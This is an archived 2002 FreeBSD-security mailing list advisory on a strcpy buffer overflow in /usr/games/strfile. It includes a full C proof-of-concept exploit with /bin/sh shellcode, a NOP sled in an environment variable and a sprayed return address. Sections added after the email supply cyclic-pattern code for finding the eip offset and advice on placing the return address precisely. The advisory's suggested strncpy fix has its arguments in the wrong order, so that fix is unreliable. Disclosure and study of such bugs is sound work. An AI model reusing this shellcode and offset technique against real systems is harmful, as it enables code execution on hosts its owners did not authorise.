Date: Sun, 05 May 2002 22:33:14 +0100
From: ReDeeMeR <g0tr00t@usa.net>
To: <FreeBSD-security@FreeBSD.org>
Subject: Buffer overflow in /usr/games/strfile
Message-ID: <20020505213314.8762.qmail@uwdvg007.cms.usa.net>
[-- Attachment #1 --]

Hi,

Below is an advisory for a vulnerable buffer in the /usr/games/strfile binary which can be overflowed. I emailed this information to security-officer@freebsd.org on 28/04/02 and have yet to receive a reply. The reason I am posting this so early is that it is not really a major security risk (the binary file in question is not suid), but it is a practice of bad coding, so I felt it my duty to make you aware of it. Also find attached my proof of concept code.

Thanks,
-ReDeeMeR-

--begin paste--

-=[ g0tr00t.net advisory ]=-

FreeBSD /usr/games/strfile buffer overflow
ReDeeMeR (redeemer@g0tr00t.net)
http://www.g0tr00t.net
http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt

-=[ Date discovered ]=-
24/04/02

-=[ Discovered by ]=-
ReDeeMeR (redeemer@g0tr00t.net)

-=[ Outline ]=-
FreeBSD /usr/games/strfile contains a vulnerable buffer which can be overflowed. The games package is NOT installed by default. The strfile binary is NOT suid (4755); thus, the security risk here is not great.

-=[ Impact ]=-
No extra privileges can be gained.

-=[ Affected ]=-
Successfully tested on FreeBSD 4.5-RELEASE; suspected vulnerability on ALL FreeBSD machines which ship this software.

-=[ Vendor Status ]=-
FreeBSD (http://www.freebsd.org) contacted on 28/04/02.
No reply after 7 days, so released this advisory due to the fact that this is not a major security issue.
Advisory released on 05/05/02.

-=[ Description ]=-
/usr/games/strfile ("strfile" hereafter) is vulnerable to a standard buffer overflow. The problem exists due to insufficient checking procedures on command line input. The vulnerability exists in a poorly utilised strcpy() call (found on line 310 of strfile.c) which reads from an unchecked buffer:

    (void) strcpy(Outfile, *argv);

Thus, a large input (greater than the allocated buffer space) will cause strfile to segfault. This in turn can lead to the execution of arbitrary commands.
A user can cause strfile to crash by inputting a string of length equal to or greater than 1069 bytes, and an input of equal to or greater than 1088 bytes in length will cause the eip of strcpy() to be overwritten with our input. This can be further investigated with the use of gdb, although I am not going to paste gdb output in this advisory.

To reproduce this bug, execute the following command:

    FreeBSD$ /usr/games/strfile `perl -e 'print "A" x 1069'`

-=[ Proof of concept ]=-
Proof of concept code can be located at:
http://bse.die.ms/~redeemer/releases/ReDeeMeR/exploits/strfilexp.c

If the program is successfully exploited, the terminal output should look something like this:

    bash-2.05a$ uname -a
    FreeBSD 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sat Apr 20 14:14:37 BST 2002     redeemer@:/usr/src/sys/compile/TOX  i386
    bash-2.05a$ id
    uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel)
    bash-2.05a$ ./strfilexp
    ReDeeMeR's proof of concept code for /usr/games/strfile
    Using return addr:      0xbfbffb0c
    Buffer size:            2000
    $ id
    uid=31337(redeemer) gid=31337(redeemer) groups=31337(redeemer), 0(wheel)
    $

*Notice that no extra privileges have been gained (due to strfile NOT being suid)*

-=[ Fix ]=-
A suggested fix was sent by me to FreeBSD to use strncpy() instead of strcpy(). Replace

    (void) strcpy(Outfile, *argv);

with:

    (void) strncpy(Outfile, sizeof(Outfile), *argv);

FreeBSD have yet to respond to my e-mail, but I will assume that they received it and have implemented an update in strfile.c within the FreeBSD-current branch.

-=[ Greets ]=-
Thanks to:
The Itch - For various mentoring and for hosting g0tr00t.net.
keoki - Someone to collaborate/compete with.
Chawmp - " " " " "

Greets: #g0tr00t, #ch0wn, #Turbo-IRC, #NeXT.
--end paste--

[-- Attachment #2 --]

/* Proof of concept code for /usr/games/strfile [28/04/02]
 * Does not gain root shell, merely a proof of concept code
 * Tested on FreeBSD4.5-RELEASE
 * Find the advisory at
 * http://bse.die.ms/~redeemer/releases/ReDeeMeR/advisories/strfilexp.txt
 *
 * redeemer@g0tr00t.net
 * http://www.g0tr00t.net
 * http://bse.die.ms/~redeemer/legal.shtml applies to this file.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen(), memcpy() */
#include <unistd.h>

#define MOO 2000      /* RET size: bytes of repeated return address passed as argv[1] */
#define LEN 2048      /* EGG size: NOP sled plus shellcode placed in the environment */
#define NOP 0x90

/* FreeBSD execve shellcode */
char shellcode[]=
"\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b"
"\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53"
"\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff"
"/bin/sh";

int main(void)
{
    char *buff, *egg, *ptr;
    long *addr_pointer, addr;
    /* the address of a local in this frame is used as a rough guess of where
     * the target's stack, and therefore the EGG environment string, will sit */
    int bsize = MOO, eggsize = LEN, get_sp = (int)&get_sp, i;

    buff = malloc(bsize);
    egg = malloc(eggsize);

    printf("ReDeeMeR's proof of concept code for /usr/games/strfile\n");
    printf("Using return addr: \t0x%x\n", get_sp);
    printf("Buffer size: \t\t%d\n", bsize);

    /* argv[1]: the guessed return address repeated across the whole buffer,
     * so the exact offset of the saved eip does not have to be known */
    ptr = buff;
    addr_pointer = (long *)ptr;
    for (i = 0; i < bsize; i += 4 ) {
        *(addr_pointer++) = get_sp;
    }

    /* the egg: a NOP sled followed by the shellcode */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) {
        *(ptr++) = NOP;
    }
    for (i = 0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    /* the first four NOPs become the variable name, so the sled is exported as EGG= */
    memcpy(egg, "EGG=", 4);
    putenv(egg);

    execl("/usr/games/strfile", "strfile", buff, NULL);
    return(0);
}
/* EOF */
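The advisory's Description and Fix sections turn on one line, the unbounded strcpy() into Outfile, and on replacing it with strncpy(). The following is an added example, not code from the advisory or from strfile.c: it puts the unsafe pattern next to two bounded replacements and shows the two things a reviewer checks on a strncpy() fix, namely the argument order (the C signature is strncpy(dst, src, n), so the size belongs in the third position) and the fact that strncpy() writes no terminator when the source is at least n bytes long. OUTFILE_LEN, make_arg() and the function names are assumptions chosen for the demonstration; the 1069 and 1088 byte lengths are the advisory's own figures, constructed here as strings of 'A' like the perl one-liner.

```c
#include <stdio.h>
#include <string.h>

#define OUTFILE_LEN 64      /* assumed fixed buffer standing in for strfile's Outfile */
#define MAX_ARG     4096

/* Constructed input: n bytes of 'A', like `perl -e 'print "A" x n'`. */
static const char *make_arg(size_t n)
{
    static char arg[MAX_ARG + 1];
    if (n > MAX_ARG) n = MAX_ARG;
    memset(arg, 'A', n);
    arg[n] = '\0';
    return arg;
}

/* The pattern the advisory reports: no bound at all. Only safe when the caller
 * has already guaranteed strlen(src) < OUTFILE_LEN, which strfile did not. */
static void set_outfile_unsafe(char *dst, const char *src)
{
    (void) strcpy(dst, src);
}

/* Bounded copy with strncpy: size is the THIRD argument, and the terminator
 * must be written by hand. Returns 0 if src fit, -1 if it was truncated. */
int set_outfile_strncpy(char *dst, size_t dstsz, const char *src)
{
    strncpy(dst, src, dstsz - 1);
    dst[dstsz - 1] = '\0';
    return strlen(src) < dstsz ? 0 : -1;
}

/* Stricter variant: refuse oversized input instead of silently truncating it,
 * since a truncated output filename would point at a different path. */
int set_outfile_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Result of the checked copy for an n-byte argument: 0 accepted, -1 rejected. */
int checked_copy_result(size_t n)
{
    char outfile[OUTFILE_LEN];
    return set_outfile_checked(outfile, sizeof outfile, make_arg(n));
}

/* Bytes actually stored by the strncpy variant for an n-byte argument. */
size_t strncpy_copy_stored_len(size_t n)
{
    char outfile[OUTFILE_LEN];
    set_outfile_strncpy(outfile, sizeof outfile, make_arg(n));
    return strlen(outfile);
}

/* 1 if a raw strncpy(dst, src, sizeof dst) left dst with no terminator,
 * i.e. the caller forgot dst[sizeof dst - 1] = '\0'. */
int raw_strncpy_unterminated(size_t n)
{
    char outfile[OUTFILE_LEN];
    memset(outfile, 'X', sizeof outfile);
    strncpy(outfile, make_arg(n), sizeof outfile);
    return memchr(outfile, '\0', sizeof outfile) == NULL;
}

int main(void)
{
    char outfile[OUTFILE_LEN];
    size_t sizes[] = { 8, OUTFILE_LEN - 1, OUTFILE_LEN, 1069, 1088 };

    set_outfile_unsafe(outfile, "fortunes");   /* fits, so this call is safe */
    printf("unsafe copy of a short name: %s\n", outfile);

    for (size_t i = 0; i < sizeof sizes / sizeof sizes[0]; i++) {
        size_t n = sizes[i];
        printf("%4zu bytes: checked=%d strncpy stored=%zu raw strncpy unterminated=%d\n",
               n, checked_copy_result(n), strncpy_copy_stored_len(n),
               raw_strncpy_unterminated(n));
    }
    return 0;
}
```

The checked variant is the one to prefer for a filename: the program should fail loudly on an oversized argument rather than quietly open a shorter path. Where strlcpy() is available (it is on FreeBSD) it gives the same bounded, terminated copy in one call and reports truncation through its return value.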
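The advisory states that 1088 bytes of input reach the saved return address and that the figure came from gdb, and the proof of concept sidesteps the exact offset by repeating the guessed address across all 2000 bytes. The usual way to pin such an offset down is a cyclic pattern: pass it as the argument instead of "A" x 1069, read the value gdb reports in eip after the crash, and look those four bytes up in the pattern. The block below is an added example, not part of the advisory or its proof of concept; it generates the pattern (three-byte groups over A-Z, a-z, 0-9, so every four-byte window is unique for the first 20280 bytes) and recovers the offset from a crash value. It does not run strfile: recover_offset() and offset_of_value() simulate the crash by reading the pattern at a chosen offset the way a little-endian eip load would, and 1088 is used only because it is the advisory's number.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill buf with len bytes of the cyclic pattern "Aa0Aa1Aa2...". Returns the
 * number of bytes written (len, capped at the 20280-byte unique span). */
size_t pattern_create(char *buf, size_t len)
{
    size_t i = 0;
    if (len > 20280)
        len = 20280;
    for (char u = 'A'; u <= 'Z' && i < len; u++)
        for (char l = 'a'; l <= 'z' && i < len; l++)
            for (char d = '0'; d <= '9' && i < len; d++) {
                char group[3] = { u, l, d };
                for (int k = 0; k < 3 && i < len; k++)
                    buf[i++] = group[k];
            }
    return i;
}

/* The 32-bit value eip would hold if the saved return address were loaded
 * from the four pattern bytes at `offset` (little-endian, as on i386). */
uint32_t eip_at(const char *buf, size_t offset)
{
    const unsigned char *p = (const unsigned char *)buf + offset;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Given the crash value from eip, return the pattern offset those four bytes
 * came from, or -1 if the value is not a pattern window (e.g. 0x41414141). */
long pattern_offset(const char *buf, size_t len, uint32_t eip)
{
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff),         (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff)
    };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Simulated round trip: build a len-byte pattern, take the eip a crash at
 * `offset` would produce, and recover the offset from that value alone. */
long recover_offset(size_t len, size_t offset)
{
    if (offset + 4 > len)
        return -1;
    char *pat = malloc(len);
    if (pat == NULL)
        return -1;
    size_t n = pattern_create(pat, len);
    long found = pattern_offset(pat, n, eip_at(pat, offset));
    free(pat);
    return found;
}

/* Look up an arbitrary crash value against a len-byte pattern. */
long offset_of_value(size_t len, uint32_t eip)
{
    char *pat = malloc(len);
    if (pat == NULL)
        return -1;
    size_t n = pattern_create(pat, len);
    long found = pattern_offset(pat, n, eip);
    free(pat);
    return found;
}

int main(void)
{
    char pat[2048];
    size_t n = pattern_create(pat, sizeof pat);
    uint32_t crash = eip_at(pat, 1088);   /* stands in for the value gdb would show */

    printf("pattern bytes: %zu\n", n);
    printf("eip after a hypothetical crash at 1088: 0x%08x -> offset %ld\n",
           crash, pattern_offset(pat, n, crash));
    printf("0x41414141 (all 'A') -> offset %ld\n", pattern_offset(pat, n, 0x41414141u));
    return 0;
}
```

With the offset known, an exploit can place the return address exactly once at that position instead of spraying it, which keeps the argument short enough to survive any later length checks the target applies.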
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020505213314.8762.qmail>
